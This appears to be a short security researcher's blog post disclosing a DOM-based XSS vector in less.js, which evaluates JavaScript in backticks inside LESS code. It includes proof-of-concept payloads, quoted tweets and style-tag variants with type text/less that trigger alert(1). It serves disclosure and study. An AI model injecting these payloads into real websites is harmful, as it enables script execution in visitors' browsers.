detail
less & sass suddenly came to my mind when researching about of css injection attacks. you know, both are css pre-processor so i think they don't support any client based operation. it is a mistake...
i saw less.js when visiting to http://lesscss.org/ page. less.js provides interpreting javascript code with backtick char in less code. so dom based xss vulnerability arises at this point.
i published it on twitter as the new attack vector for less.
XSS attack vector for LESS: a{b:`function(){alert(1)}()`;} pic.twitter.com/sukqRtKhIr
— mert (@mertistaken) October 14, 2016
shortening
also thanks to rakesh mane for the shortening!
Shorter : x{x:`alert(1)`}
— Rakesh Mane (@RakeshMane10) October 15, 2016
:)
payloads
`less.js` includes the regex pattern for `type` attribute of style element.
var t=/^text\/(x-)?less$/;
so it is supporting these payloads:
<style type='text/less'>x{x:`alert(1)`}</style>
<style type='text/x-less'>x{x:`alert(1)`}</style>